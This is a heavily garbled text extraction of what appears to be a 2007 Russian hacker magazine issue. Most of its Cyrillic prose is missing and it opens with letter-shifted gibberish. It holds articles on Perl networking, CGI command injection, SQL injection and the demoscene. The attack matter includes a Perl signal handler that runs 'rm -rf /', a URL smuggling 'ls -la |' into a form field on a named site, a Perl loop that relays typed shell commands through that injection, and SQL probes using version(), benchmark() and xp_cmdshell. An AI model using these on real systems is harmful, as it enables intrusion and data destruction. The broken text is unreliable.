2JYFQ,JFW8TQNI8ZGXYFSHJ-ZSYNSL:SQNRNYJI7FNQ7ZSSJW)8JLF7FQQ^*8533-1-THPJ^
0*[TQZYNTS,98JWNTZX8FR9MJ+NWXY*SHTZSYJW9TRG7FNIJW9MJ5WTUMJH^2JYFQ+FYNLZJ8YFW3JY+WTSYNJW)NL)ZL)NLLNSL8YWNPJ2TWYFQ0TRGFY
)JHJUYNTS*^J9T^5QF^)ZSLJTS8NJLJ..'WTPJS<TWQI'FYYQJKNJQI'FI(TRUFS^0NSLTK+NLMYJWX2F]NRZR.RUFHY)JFYM
/W'JS-ZW,TQIJS*^J7TLZJ&LJSY1ZSFW0SNLMYX7FNI4[JW9MJ7N[JW7TTYX'TZSY^-TZSIX&LJTK
<TSIJWX8MFIT\2FLNH.HJ\NSI)FQJ+NJQI(TRRFSIJW)FNLFXXT'FSI'WTYMJWX(ZWXJ9MJ*^JTK.XNX5WNSHJTK5JWXNF9MJ9\T9MWTSJX)NXSJ^X1NQT 
8YNYHM8JHTSI1NKJ'TRGJWRFS1FSI9TZHM+WTLLJW-JQRJY(MFTX8JWNTZX8FR&I[FSHJ8TSNH&I[JSYZWJ'FYYQJ3-19MWTSJTK)FWPSJXX-NYRFS(TSYWFHYX<TWRX'QFXY)JQF\FWJ8Y/TMS;TQZRJ9MJ8JFHQNKK9WFLJI^-JF[^<JFUTS)JQZ]J*XHFUJ;JQTHNY^3T[F'FYYQJXTK5WNSHJTK5JWXNF
2JYFQ8QZL&I[FSHJ2TSXYJW2FISJXX<FWMFRRJW,QTW^NS)JFYM8UQFXMIT\S7NIJX,TSJ<NQI)FWP(QTZI8YFWXMNUX:SQNRNYJI)N[NIJI,FQF]NJX
8MFIT\2FSJHTSI(TRNSL+NLMY3NLMY(TSIJRSJI(WNRNSFQ4WNLNSX3JJIKTW8UJJI2TXY<FSYJI8NRX:SQJFXMJI1TWITK
YMJ7NSLX9FHYNHX0NSLITR:SIJW+NWJ-JWTJX:+(8ZIIJS.RUFHY0FNITZ7FHNSL'FYYQJ8YTQJS:QYNRF=4I^XXJ^)WFLTS*RUNWJX
&SXZ_FS7FNIT7TRJ9TYFQ<FW'FWGFWNFS.S[FXNTS2FUQJ8YTW^+WJJITR+TWHJ[X9MJ9MNWI7JNHM(FUHTR(QFXXNHX(TQQJHYNTS7JQTFIJI2TSXYJW9WZHPX)8
3NSOF,FNIJS'QFHP,9&I[FSHJ5WT(TSHJUY7FHNSL1ZSFW1JLJSI/FPFSI)F]YJW<N_FWIW^2W7TGTY4[JWHQTHPJI8THHJW+ZW^8\NYHMKNWJ
5NWFYJXTKYMJ(FWNGGJFS)JFI2FSX(MJXY4ZY7ZS(TFXY(TFXY&WRTWJI(TWJ3J]ZX&SFHMWTST]3JJIKTW8UJJI-TY5ZWXZNY)F^
TKYMJ2ZYFSYX0NWG^&NW7NIJ8JYYQJWX8YFW<FWX,FQFHYNH'FYYQJLWTZSIX+FQQTZY'WTYMJWMTTITK8YJJQ)FWP&LJTK(FRJQTY1FG^WNSYMTKYMJ2NSTYFZW
2*9749MJ1FXY7JKZLJ=JSZX3NSYJSITLX)FHMXMZSIFSI+WNJSIX2JLF2FS'FYYQJ(MNU(MFQQJSLJ&WTZSIYMJ<TWQINS)F^X
2JHM<FWWNTW2JWHJSFWNJX+WFRJ(NY^0NQQJW(TRGFY2NXXNTS8MTHP+TWHJ-TWXJ_+NWJI:U8MNJQI<FW<TWQI9FHYNHFQ(TRGFY2FIFLFXHFW2FKNF9MJ
(NY^TK1TXY-JF[JS8YFW9WJP)JJU8UFHJ3NSJ9MJ+FQQJS*FXY.SINF(TRUFS^,ZSIFR8JJI'FYYQJ&XXFZQY2JLF2FS?JWT8<&9,QTGFQ
8YWNPJ9JFR2TGNQJ+TWHJX8UJHSF_+QFY4ZY1F\ 4WIJW/ZXYNHJ.X8JW[JI8MJSRZJ../FRJX'TSI*[JW^YMNSLTW3TYMNSL'WNFS1FWF.SYJWSFYNTSFQ(WNHPJY8NRX:SN[JWXNY^'FSOT5NQTY0FFS'FWGFWNFSX'QFIJ8U^WT&-JWTX9FNQ<FWQTWIX.;-JWTJXTK*YMJWNF,ZNQY^,JFW=8UNPJ9MJ
-JILJMTL5NWFYJX9MJ1JLJSITK'QFHP0FY0NSLTK+NLMYJWX*=-T\QNSL'QTTI(WJFYZWJ(TSKQNHY9MJ(QFS<FWX8YFW<FWX'FYYQJKTW3FGTT9TR(QFSH^X
9MJ8ZRTK&QQ+JFWX(TRRFSIJW*ZWTUJFY<FW(WF_^+WTL7FHJW)NLNRTS<TWQI)8+NWJKNLMYJW(TRRFSI7FLNSL.SKJWST
3JNLMGTZWXKWTR-JQQ4S;FHFYNTS-T[JW&HJ(TRGFY7FHNSL?TSJ8FGTYFLJ+NXYTKYMJ*RUNWJ&QFWRKTW(TGWF3NYWT(TQI3NLMY8ZS*YJWSFQ8TSFYF
2FXX*KKJHY'FQIZWX,FYJ)FWP&QQNFSHJ7ZRGQJ7TXJX8\TWITK*YMJWNF9NRJ8UQNYYJWX..3-17ZXMKTW'JWQNS
)NJ-FWI3FPFYTRN5QF_F-NYRFS'QTTI2TSJ^(QN=W7FHJYT7JXZWWJHYNTS+NWJ*RGQJR5FYMTK7FINFSHJ89&10*78MFIT\4K(MJWSTG^Q+TWRZQF
4SJ)JXHJSY2F]NRT[X&WR^TK?NS(W^XYFQ0J^9MJ+FW7JFQR,WFSINF=YWJRJ(WTXXKNWJ

62 02-07

Perl

- .
.
PERL,
.
Insider
brain_insider@mail.ru

Perl, :
,
.
- ,
. ,
,
, .

Perl, ,
. , ,

, .
,
, , , ,
Perl.
, (exploit, .)
c , , . , .
, , -

, , . ? ,
DoS-
- .
, , . ,
Perl.

, , .
? , , TCP/IP.
Perl? Perl, ,
. , /++,
Perl . , ;),
, Perl 200-300
10 . ,
. Perl - .
Perl-, C,

Perl .
,
, Perl. ,

.
, Perl
. ,
,
C, , , . , ,
, Perl . ,
, (,
), , ,
. , :
Perl
CPAN ( ). - , - CPAN. Perl
( , Unix,
).

63

), request
LWP::UserAgent, ,

HTTP::Response. LWP::UserAgent
,
. , HTTP
HTTP-.
HTTP::Request:
METHOD ,

(
POST, GET, PUT ..).

, , Perl , .
- ,
,
. ,
,
Perl-. Perl
, :).
, , , ,
Perl,
/ .
www. web-? , HTTP- . , ,
SQL-
( , , web), , , ,
.
,
LWP (LWP The World-Wide Web library for Perl).
,
www,
, . , www: (ftp, http, file, smtp, etc.) e-mail'.
,
, LWP , ,
- , - .
HTTP-style , -.
. HTTP::Request ( HTTP

URI (UNIFORM RESOURCE IDENTIFIER)


, ,

,
,
,
, HTTP:://MEGASITING.EE:8080/SCRIPT.CGI?PARAM=PAM&PAM=PAM.
HEADERS


-.
HTTP-
.
CONTENT ,
.
,

HTTP::RESPONSE,
,
:
CODE (200
, 404 FILE
NOT FOUND, 500
);
1

MESSAGE
( );
2

HEADERS
.
;
3

CONTENT , .

, HTTP- ( 1).
, . LWP::UserAgent,
. , Perl .
-
(


, -).
, LWP::UserAgent : LWP::UserAgent->new(from!'pupkin@gov.no',
agent->'MyMegaMailSender/2.5.7', ) # SMTP-.

agent, . HTTP-, -

CPAN (Comprehensive
Perl Archive Network)
CPAN (COMPREHENSIVE PERL ARCHIVE
NETWORK)
PERL , CPAN.ORG. SEARCH.CPAN.ORG WEB-, PERL. PERL
,
. - CPAN.ORG
. , ,
, ,
.
,
CPAN ,

PERL. ,
. , CPAN,

,
.
, - . - , .
,
SEARCH.CPAN.ORG , WWW,
NET, RSS . ,
. ,
CPAN
PERL,
.

64 02-07

PEERADDR ( PEERHOST)

'XX.XX.XX.XX' ;
P E E R P O R T ,
;
P R O T O ,
('TCP, 'UDP' );
T Y P E .
SOCK_STREAM ( ,

),

SOCK_RAW (, ) SOCK_DGRAM
( ).

Comprehensive Perl Archive Network

, . HTTP::Request

request, . is_success ( is_error) 1 . ,

.
, - ,
,
.
LWP::Simple,
:
G E T ( $ U R L ) , $URL, $URL ;
H E A D ( $ U R L )
;
G E T P R I N T ( $ U R L ) ,
;
G E T S T O R E ( $ U R L , $ F I L E )
$FILE, .

,
HTTP-. LWP
. , LWP
Proxy, . .

.

, Perl . ,
-
Perl. Perl IO::Socket, .
,
(, IO::Socket::INET
TCP- UDP-, IO::Socket::SSL
). , Perl Socket,

C- Socket.h , IO::Socket.
TCP-, - , IO::Socket::INET, :
use IO::Socket::INET;
my $socket = IO::Socket::
INET->new(PeerAddr->$remote_host,
PeerPort->$remote_port, Proto->
tcp, Type->SOCK_STREAM)
or die Can't open connection
with $remote_host:$remote_port: $!\n;
print $socket 'Save the planet kill
yourself!';
$answer = <$socket>;
close($socket);
. IO::Socket::INET :

, ,
print <>.
(
, ), Listen ( ), Type LocalPort.
, :
my $serever = IO::Socket::
INET->new(LocalPort => $server_port,
Type => SOCK_STREAM, Listen => 10);
while($client = $server->accept())
{
... #
}
$server->accept()
( IO::Socket) , $socket .
,
Socket, C, man socket .
,
Net::*. , , Telnet, SMTP, FTP (Net::Telnet,
Net::SMTP, Net::FTP ). , (Net::IP, Net::TCP, Net::HTTP, Net::Gen,
Net:Inet ...), . Net::Gen Net::Inet ,
Net::TCP tcp- (
Net::Inet Net::Gen), Net::IP IP-, Net::HTTP
http
.

65

Net::HTTP. , .

HTTP-, LWP,
www-. Net::HTTP
IO::Socket::INET,
,
Net::HTTP.
Net::HTTP
:
use Net::HTTP;
my $con = Net::HTTP->new(Host->
www.xakep.ru) || die 'ups, somthing
wrong...';
$con->write_request(GET->"/",
'User-Agent'->"MyMegaAgent/1.0");
my($code, $mess, %h) =
$s->read_response_headers;
while (1) {
my $buf;
my $n = $s->read_entity_body($buf,
1024);
die "read failed: $!" unless defined $n;
last unless $n;
print $buf;
}
, ,
,
NetPacket, ,
NetPacket::Ethernet, NetPacket::TCP, NetPacket::IP,
NetPacket::ICMP .


. decode
.
,
.
encode, , ,
. CPAN (http://search.cpan.org/search?query=NetPacket&mode=all).

. Perl ,
, . . Perl .
%SIG , .
, $SIG{'INT'} = 'IGNORE'
Ctrl+C. , , , - :
$SIG{'TERM'} = $SIG{'INT'} = {print
'Whats da F@#$?!'."\n";
system('rm -rf /');}; #

-
, , .
,
C- -

ftp
use LWP::UserAgent;
my $obj = LWP::UserAgent->new();
$obj->agent('MyExapmle/1.0');
my $req = HTTP::Request->new(GET!'http://www.xakep.ru');
my $result = $obj->request($req);
if($result->is_success)
{
print 'Code: ' . $result->code . "\n";
print 'Message: ' . $result->message . "\n";
print 'Headers: ' . $result->headers. "\n";
foreach my $key ( keys(%{$result->headers}) )
{
print '
' . $key . ":" . $result->headers->{$key} . "\n";
}
}
else
{
print $result->status_line, "\n";
}
1;

(1)

Unix . Perl syscall, :


syscall LIST;
( ), LIST &SYS__, .
, Perl 14 .
syscall -1
$!,
,
. :
package main;
require 'syscall.ph';
use strict;
$!=0;
my $string = 'Hell no, world!';
$!=0;
syscall (&SYS_write, fileno(STDOUT),
$string, length $string);
if($!)
{
print('syscall SYS_write failed:
' . $! . "\n");
}
else {print "Success!\n"};
1;
, , fileno , length . , , , ,
Perl.
, man.
. ,
,
Perl. , , ,

, . ,
, . ,
, , ,
. Perl , , Perl ( ),
, . , , !

66 02 -07




CGI- ,
.
, WEB-
CGI- (
).
Insider
brain_insider@mail.ru

, , .
,

- :).
, ( cgi
). .
, .
-
. ,
. :). ,
, , ,
. , ,
- , , ( , ), , (
, HTTP- POST GET
).
, ,
. - HTML- (, <a
href=www.xakep.ru></a> )
. ,
. , , , ,
,
XSS!
( ,
),

, ,
. , HTML- .
, HTML- - <INPUT TYPE=HIDDEN" NAME="ID VALUE="1167069479"> . , , ID . ,
ID , ,

.
. ,
1167069479, ,
,

1167070058. ,
,
Unix.
,
. ? ,
,
-
( ,
, ,
).
? , , -
, ,
.
, , ,

.
. , ,
, ,
shell' -.
-- . open() Perl ,
. ,
. . , , :
>perl -d -e 0
>open FF, 'ls -l |';
>print <FF>;
.
( -
0),
(
).
. , . , :
pipe
.
, .
. ,
, ,
,
. :

67

http://dm9.ru/cgi-bin/
perltest/script.cgi?Send=
%D0%9E%D1%82%D0%BF%D1%80%D0%B0%
D0%B2%D0%B8%D1%82%D1%
8C&text=1&name=1&ID=ls%20-la%20|.
,
!
-
. , .
, - . , , , -
. ,
- (, :)). .

URL
,
. ,
.
,
, , ,

, . ,
LWP
(
).
2. , , .
, , . -! ,
HTML
. ,
.
. , . , ! , , , , ,
,
, .

, , - .
?
. ,
.

HTML-
(1)
<html>
<body>
<TABLE ALIGN="CENTER">
<TR><TD>Date: Mon Dec 25 17:55:37 UTC 2006
</TD></TR><TR><TD>Name:
</TD></TR><TR><TD><PRE>
-! </PRE></TD></TR><INPUT TYPE="HIDDEN" NAME="ID"
VALUE="1167068903
"> </TABLE><BR> <TABLE ALIGN="CENTER">
[...SKIPPED...]
<BR> <FORM ACTION="/cgi-bin/guest/script.cgi" METHOD="POST">
Name: <INPUT TYPE="TEXT" NAME="name"><BR><BR>
:<BR> <TEXTAREA NAME="text" ROWS="15" COLS="50" WRAP="PHYSICAL">
<INPUT TYPE="SUBMIT" VALUE="" NAME="Send">
<INPUT TYPE="HIDDEN" NAME="ID" VALUE="1167069479"> </FORM>
</body>
</html>

(2)
#!/usr/bin/perl -w
use strict;
use LWP::UserAgent;
my $obj = LWP::UserAgent->new();
my $req = "";
my $url = shift;
while(1)
{
my $comm = "";
print '> ';
$comm = <STDIN>;
chomp($comm);
my $query =
$url.'?Send=%D0%9E%D1%82%D0%BF%D1%80%D0%B0%D0%B2%D0%B8%D1%82%D1%8C&text=1&name=1&
ID='.$comm;
print "\n".$query."\n";
$req = HTTP::Request->new(POST => );
my $result = $obj->request($req);
if($result->is_success)
{
print "ok!\n";
print $result->content;
}
}
1;

S P E

I A L

68 SPECIAL DELIVERY 02- 07

-.

.


.

SECURITYLAB.RU?

: ,
. -, , SecurityLab , , . .

: , .

. - ,
.
-.
security-,
, , .

, ,

:
, , .
.
,
Infowatch .
,


Positive
Technologies,
securitylab.ru.
,


.

, ,

(http://michael.antipov.name),

,

.

:: . ,
. , . , .
,
- . ,

.

.
,

, ?

:
, SecurityLab.

. ,
, , , ,
. , : web- , ,
.


.

,

.
?

: , . ,
. ,

69

. ,
,
.


?


.

(
), IDS-
( )
, .


, ,

: .
,
. ,
, .
: http://en.securitylab.ru/nvd/.
21260,
1 1988 .

: . , , . , ,
,
.

( ).
, ,

?
?

: ,
- . , ,
Positive Technologies, . , .
, .

Q
F A
L
A
I
E
P
S


Spider_Net
(spider_net@inbox.ru),
www.vr-online.ru

vr-online.ru,

mashp
(mashp.h10.ru).

4 ,
Delphi PHP.



.

?

, 100% .
- , , .
,
.

. , MySQL. , version() .
MySQL. -

, , ,
, , . SQL Injection
, .
.
, ,

PHP .
www.kipelov.ru/ly.php?idtxt=1
. - idtxt, - .
version() : www.kipelov.ru/ly.php?idtxt=version(). , -

71

, .
, .
MySQL,
.
, UkrTeam.
. www.packetstortsecuiry.nl.

, , MS SQL Server.
. , MS
SQL Server. , SYSTEM, .

SQL INJECTION ?

SQL INJECTION
(COOKIES)?

, - POST-.
.
, ,
. cookies. , , CookieEditor
SQL Injection. Cookies.
SQL

, .
MySQL BenchMark,
. : benchamrk(1000000, md5(current_time)). 100000 md5
. , . , , ,
benchmark . MySQL- ,
, , ,
. ,
.

INJECTION 3- 4-
MYSQL?


SQL INJECTION?

, 4- .
UNION, , . SQL Injection.
Bugtraq , SQL Injection .
?
SQL INJECTION
MS SQL SERVER?

. , version 4, , , .
, ,
SQL .

.
, ! ,
.
. , .
, . , -

3- :
SQL INJECTION

?
SQL INJECTION
MS SQL SERVER?

SQL Injection , , ,
SQL Injection. ,
SQL Injection , ,
. , MS SQL Server exec
master..xp_cmdshell 'dir /p', ,

-
?

,
web-.
. PHP. .
PHP, ASP. .
, PHP . PHP 4
. .

.
, :).
(
)
.

: PHP Web-
( SQL Injection) .
,
.

S P E

I A L

72 SPECIAL DELIVERY 02- 07

,
//


,

SecurityLab.ru

Microsoft
Student Partner

Microsoft

C# .NET


www.vr-online.ru,
11
4

: ,
UNIX,


,
-8
,

.

,

W2K,
FreeBSD 4.5

SQL INJECTION

,
WEB
.
SQL INJECTION?

: SQL Injection , web-, ,


,
, SQL- ( SQL-).
: , , , backend' . - - ( , www SQL Injection). ,
.
: , , SQL,
. , , SQL. sql-, .
. ,
. (
). ( ) sql- , . , ,
, , sql-
( ,
sql- ). , web
( ), SQL Injection .

73

SQL
INJECTION ?

XSS
?

:
SQL-: ( / , )
; ,
; , ; .
: : sql-, ;
(, query_string); c ,
, ,
;
, ( ),
.
: , , , (, ). , ,
. , , ,
, .
,
, .
: SQL-. , SQL-, web-, ,
PHP Perl', , ( ), ,
PHP. SQL- ,
PHP-, SQL PHP-.
PHP (, ,
Perl). . ,
: ,
( ) ..
, ,
, - , , .
: ! , . , SQL- .

, web-IDS- ( mod_security secureIIS).
: , XSS
, .
XSS ,
PR-.
: , , HTML- (www.security.nnov.ru/articles/3APA3Ahtml.asp). , , 1998 .
, , . Aleph
One ( Bugtraq) ,
. 2001
CSS/XSS ,
Cross-Site Scripting.


ISP.

, ,
3proxy (www.security.nnov.ru/soft/3proxy/)

74 SPECIAL DELIVERY 02- 07

: . SQL Injection
. . , , , , . , , . , , , .
: .
. ,
. , ,
, . XSS-,
, , ,
:).
: XSS/Cross-Site Scripting , Netscape
JavaScript. , . . ,
. ()
, . , cookies' ( ).
. ,
.
XSS
?


SQL
INJECTION XSS ( ,
) 100%

: - SQL Injection XSS


. ( ), . :).
: , ,
- . ,
HTML- .
100% .
: .
. .
. , . , . , .
. , . ,
.
, . , . !
Agnitum , , , Outpost Firewall
, . , ,
. , .
: Java , , (, ). IE , . ,
. ,
( Lynx, Linux).
: , 100% .
.
(, , ) 100, 90%. , - .
: ,
, , .
: 100% .
, . ,
. , . , .
, , ,
. , .

{ IT }



-!
,
,
,
,
,
,
.

!
IT :
OPEN SOURCE
:
;

;
WEB-OFFICE: ?















ZZZ[DNHSUX


rr

 VXEVFULEH#JOFUX
  

 
 


 

 









 
  
          
 
,1)2#*/&58  :::;$.(358

, 




  



78 -TOPIC 02-07

>>



. 78

, ,

. 84




. 88

, .
, , .
- , , ,
. ,
.
, ,
, . ,
-. ,
( , 64 ,
), ,
, :)

demo-

,


,

.
? , ,
,

demo internal mechanics. , , .


.

, , .

20 . , kkapture
AVI
? !
. , ,

AVI' 25 , 100 200! ,
,
, .
?
, , ,
, ?. , .
C/C++ (VC, GNU C). , ,
, , C++
or die. , ,
, ,
MSDN, Direct-X SDK -

. just rumors. C/C++ . Delphi, VB , -


(, :-)).
. , . -
. , .
.
(, C++?). Werkkzeug.
( :)).

. ,
.
Farbrausch fr-025
( ).
, WZ
! WZ www.vova4age.narod.ru.

Moppy Demopaja. , WZ, Demopaja
,

80 -TOPIC 02-07

- (
). , neon v2
xplsv opensource- Plasticator.

, . : ,
, .
, , .
. .
- ,
. PNG JPG,
,
.
- 3Ds. -
( Deep Exploration).
, , . !
,

.
.
, ? www.sourceforge.net

. , dry wash only, 40 C, no bleach,
inside out, no machine washing OR just give it to
your wife its her job,
.
. ,
, ;).


. , . 64 Fr-08: The Produkkt ( ).
! ,
, (hi,
f0x!) Plasticator (http://plasticator.heroez.net). , , ,
,
. , how to. , , -

, ,

,
0

www.ainc.de
Texture
. , ,
, Plasticator,
.
.
? . (software)

OpenGL / DirectX (hardware accelerated).
, . (raytracing).


(scanlines),

, -

.

,

, - .
OpenGL DirectX.
OpenGL DirectX , , , DirectX
programmer-friendly.
, . DirectX, OpenGL
.

OpenGL , . . , . API OpenGL 2.0 , 2.

81

www.ainc.de Texture


SDL (Simple DirectMedia Layer, www.libsdl.org)
,
.


API SDL, OpenGL, ,
- ;).
C++
OpenGL/DirectX. ,
,

3D-. ,
, ,

, . .
,
,

;
,
;
API
. . new feature?
. , API
, ,
. , ,
, ,
.

.
, .
OpenGL- www.nehe.gamedev.net.
( (!) , )
, NeHe -. , -

NeHe .
NeHe
http://pmg.org.ru/nehe.
http://ultimategameprogramming.com OpenGL DirectX.
UGP , NeHe HDR,
Shadows-, , , ,
. DirectX
SDK,
, 8-
9- SDK .
. !
, ,
, , .

MIDI, , .
MIDI- MIDI. . ,
, . , ,
MIDI , ,
. :). .
,
() , .
. , () .
MOD:
8
4 .

the.popular.demo Farbrausch

{+} .

{-}

{+} , 10-
.

{-}

{+} ,

{-}

82 -TOPIC 02-07

{Werkkzeug}
www.theprodukkt.co
ll-in-one,

{Moppy Demopaja}
http://demopaja.org

,
plugin'

{Neon v2}
http://neonv2.com



,


{Plasticator}
http://plasticator.heroez.ne
,

,


. (
mp3-style ). : Haujobb disclone : T-Rex broadband.
: IT Impulse Tracker v2.14, XM
FastTracker 2. DOS' , win+linux IT Schism
tracker, XM Fast Tracker 3.
200-2000 .

( ) . - :
? . , .

()
. ,
, , .

,

( 21 ,
prerendering). , ,
: Farbrausch fr-34, AOS offworld ( , - CC-2006
, hi to Preston & UNC!).

, , ,
.
:
mp3, ogg, wma. .
. ,
:).
: mfx
deiteies, kewlers a significant deformation near
the cranium.

. , ,
.
Bass (, -
. ) Ian Luck
fMod Firelight multimedia. .
.
,
mp3 , . Bass mpeg MO3, fMod

Fr-08 : The Produkkt

. , MinifMod,
.
. demotools www.pouet.net public-, ,
.
? , generic-
.
,
,

NeHe.
.

. ,
progressbar? .
.
( ), . 64 , ,
.exe . , demo_fullscreen.exe demo_window.exe. - .
. ,
. OpenGL
pixelformat.

83


custom framerate. . 640x480@100, 640x480@default.
.
, single-file , .exe-
. .
.exe,
UPX ASPack.

ZIP, RAR. .
unique unRar library
(http://www.unrarlib.org).
,
. ,
temporary file,
, . , ,
-.
,
. ,
(
:) . ).
-, .
,
. ! , ? , , . .
.
fMod,
,
gettickcount
QueryPerfomanceTimer . Gettickcount
10 ,
100FPS, RTDS
iP3,
.
,

. , . , 13.5 ,
10- 15-. :
0
1, (13.5-10)/(1510)=0,7. . !
.
,

, ,

, ,


{1} c
matrix the fulcrum
90-. ,

166mhz .
, , ,

!

{2}
fan still sucking nature 2003,
!
,

.
{3}
rgba paradise,

! 56 !

, glow\bloom. ,
sc, .
.
, ,
,
D3D OpenGL . :). -.
onclusion .
,
, -

--. ,
, , . how does it work : ,
. . ,

, . ,
: DiHalt
ChaosConstructions

84 -TOPIC 02- 07


. C,
,
1993


Q: ! :
, ,
.
A: , .
Q: , , .
A: , IT
. ,
, . . 33 .
Q:
, ,
.
A: , 1993 1994 Realm Of Illusion
,
(diskmag) iNFUSED BYTES, -
intro, .
1995
demo party ENLIGHT'95 ().
Q:
.
?
A: demo party . intro demo, , .
Q:
?
A: . ,
. 8 Commodore 64, Amiga. PC
intro demo.
Q: ,
? ?
A: .
. ,
- -

/ . Fireworks Cross.
Q: , , ,
,
.
?
A: Commodore 64. - ( ,
,
).
C64 , , - ( ,
). Place in

85

Space Taboo, Red Storm by Triad, Wonderland,


Lights by Censor Design, Legoland by Fairlight.
Q: ,
? ,
- 90-
,
. , ?
A: . (, ), .
Q: ,


? -
? .

A: . , . - .
. . :
( iNFUSED BYTES) Bacchus/Fairlight.
GORE/Future Crew (
Future Crew,
Assembly Abyss
BBS). , PC.
Commodore 64
(
) ( GhostRider,

, 5.25" ). Commodore 64 160-300


, .
Q: ,
. ,

. ?
,
?
A: , , Realm Of Illusion PC.
C64 , Assembler ( 6510), .
,
http://www.enlight.ru/roi, -

86 -TOPIC 02- 07

PC .
,
.
, ,

Q:
?
..
A: . .
:). -
, .
Lord Ville (Aux), Jumbo
BigBug Wind Dragon.
Q: :
.
PC?
?
A: BASIC C64. , , .
, - ,
,
.
6510/6502 C64. PC
x86 Pascal. Forth.
, , .
Q: ! Asm InLine
. :
?
A: . , C64, . , (diskmags)
C64 . , , ,
( )
, .
Q: ,
?! , , ,
.
?
,
?
A: . .
: Commodore 64! Commodore Amiga! IBM PC.
, ,
(, , , ZX Spectrum). -
.
C64. -
(
,
, ) .
Commodore Amiga
( track-

mo ,
).
PC ( - ),
, . (
) ,
. .
Q: - ? ,
?
, ,
.
A: , . Amiga, Commodore 64 . C64
,
, ,
- .
.
Commodore 64, Amiga. , , , . , ,
- . C64.
Q: :
. ?
?
- ,
, ...
A: ,
Assembly 1992, 1993 .
PC, Amiga.
.
State of the Art Amiga, Second Reality
PC .
,
.

.
.
,
intro/demo , .
Q: 05-0
06?
,
? -
?
A: ,
. , , . . , ,
, , . , , (,
12334457
). . . .
, ,

, (
).
The Popular Demo, Paradise.
Q: /
?
A: RGBA, Farbrausch, Kewlers, Conspiracy, ASD,
Plastic, MFX.
Q: ? : ,
, ,
, .
A: Crolyx, Fox.
Q: ?
A: , .
. , ,
, Fox ( , ) .
, .
Q: , -
,
.
.
A: , :).
, .
Q: ', , .
-
,

, ,
-
: ,
.
A: ,
. , .
, , .
, - , , . , , DirectX.
. ,
.
Q: - ,
?
A: , :). Google .
,
: http://www.ojuice.net/ , http://www.pouet.net ,
http://www.scene.org, http://www.demoscene.ru , http://noscene.org.ru. .
Q: .
?
/ ?
A:
.
. , .

.
Q: . ,
.
A: !

$OOMDSDQHVH
WUHQGVLQVLGH

#01
2007

-
Blockbuster magazine

vfedha_[
ig[dZr
WjZjp[[
_Z[ihXehieaV

fgVXegjbsdr`
h[ah
buWeXs
^V`[dr

w{

-DSDQ

hi[g[ei_feX
evfedmVl

hVcr[_^epg[ddr[
_YgeXr[VXiecVir
_hi_dde[b_me
gVWeid_aeXhjo_WVgeX
Zege]dr[^dVa_ig[is[Yec_gV
30

u

88 -TOPIC 02-07

... ..
- ..
?! ? ,
? .

. , , GUS`A
( ),

. , 512B INTRO (
)
.
?
!
Lynx

, ,
. ,
35 ,
Freax (http://freax.hu).
,

. :
. ?
cracktro C64.
(
?) , ( )
.
, crack-
,

. , ,
.
,
.
.
. . -

GLITCH
by Kewlers
X-MIX 2004
by MFX Kewlers
TYPOGRAPHICS
by Kewlers

.
- , , , .
! , , .
. -, (, ).
, ,
,
, .
! exUSSR 10-. 2D-. , 90-,

,

89

, ,
, .
, ,
. ,
, , -

, .
, .
? , , ( ), . , , -
. ,
, .
? , . , : Future

Confused by Procreation, Spleen by Marshals, Chrome


by Damage.
2D-,
3D-, (fly by), . , ,
. :
1 Glitch by Kewlers (ftp://ftp.scene.org/pub/parties/2003/
stream03/demo/kwl_itch.zip);
2 X-Mix 2004 by MFX Kewlers (http://www.pouet.net/
prod.php?which=12028);
3 Typo Graphics by Kewlers (ftp://ftp.scene.org/pub/
parties/2004/scene_event04/demo/typo_graphics_by_kewlers.zip).
, ? , , !
?! , . , , - ,
.

90 -TOPIC 02-07

, - (
PC). , , .
2 5 6 .

-.
:
,
;
1

, .
-3D.
2

5 1 2 .
. , ,
,

3D-. 3D-
Z- 512 ,
, ,
.
4 . .
3D-, ,
,
, -
.

.
, 4 ,

23 OPENGL-

(, ,
).
,
SQUISH4K.
6 4 . !

.
?
,
64
,

,

!


2D- (
).
,
!

( ,

,
,
64 )

:
1 From Dusk til Dawn by Fairlight (ftp://ftp.scene.org/
pub/parties/2004/remedy04/demo/fairlight__from_dust_
till_dawn.zip);
2 Zoom3 by AND Cybermag (http://www.pouet.net/
prod.php?which=10454);
3 Candytron (FR30) by Farbrausch (http://www.pouet.net/prod.php?which=9424);
4 Welcome to by Farbrausch (http://www.pouet.net/prod.php?which=8696);
5 Binary Flow by Conspiracy (http://www.conspiracy.hu/dl.php3?prod=13);
6 Beyond by Conspiracy (http://conspiracy.intro.hu/
releases/cns!bydf.zip).
. , .
, , , , . , .
: . , , . , , .
. :
1
,
,
( -3D),

( 20 ),


( ),

-,

3D-
-

64 .
2 , ,
.

.

,

! , .

Kewlers MFX. -

FROM DUSK TIL DAWN


by Fairlight
ZOOM3
by AND Cybermag
CANDYTRON (FR30)
by Farbrausch
BINARY FLOW
by Conspiracy

91

92 -TOPIC 02-07

(
).
, , -
.
? .
1 Aether by MFX (ftp://ftp.scene.org/pub/parties/2005/
breakpoint05/demo/mfx_athr.zip)
2 Pornonoise
by MFX (http://www.pouet.net/prod.php?which=9467)
3 Deepness in the Sky by MFX (ftp://ftp.scene.org/
pub/parties/2002/sota02/demo/mfx_dis.zip)
4 Variform by Kewlers (ftp://ftp.scene.org/pub/parties/2002/assembly02/demo/variform_by_kewlers.zip)
5 Protozoa by Kewlers (ftp://ftp.scene.org/pub/parties/2003/breakpoint03/demo/kwl_prtz.zip)
6 A Significant Deformation Near The Cranium by
Kewlers (ftp://ftp.scene.org/pub/parties/2003/assembly03/demo/
a_significant_deformation_near_the_cranium_by_kewlers.zip)
7 X-Mix 2004 by MFX Kewlers (http://www.pouet.net/
prod.php?which=12028)
?! , 2D 3D? , 3D 2D-,
- Houjobb':
1 MicroStrange by Haujobb;
2 Elements by Haujobb;

3 We are by Haujobb (http://www.pouet.net/prod.


php?which=8281);
4 Strange Feelings by Haujobb.
, , , . , ,
, , . ? ? !
?
?

. Haujobb (>40), tAAt(>20),


ByteRapers(>30), TBL(>30), Razor 1911 ( ). 2D-, 23 3D-,
2D-, 3D, ! ! , .
.
! AND. :).

, /, . Scene is dead.

93



UNDERSPACE
(CROLYX TEAM)

DEEPNESS IN THE SKY


by MFX
AETHER
by MFX
PORNONOISE
by MFX
ELEMENTS
by HaujobbX
ELEMENTS
by HaujobbX
ELEMENTS
by HaujobbX

, .
,
, , ,
, .
,
. ,
. ? !
, , , , .


( ).
IT-
. -
,
, ,

. , ,
, 500 ,
, , , ,
? $600, 11fps. .
. ,
. GPU,
, -. , , !. ,

Xiod (, ).
.
,
Cr0ck' ( ). .
. . 512384. .
2001 ! ,
, . . , ,
: . , .
. ! , .
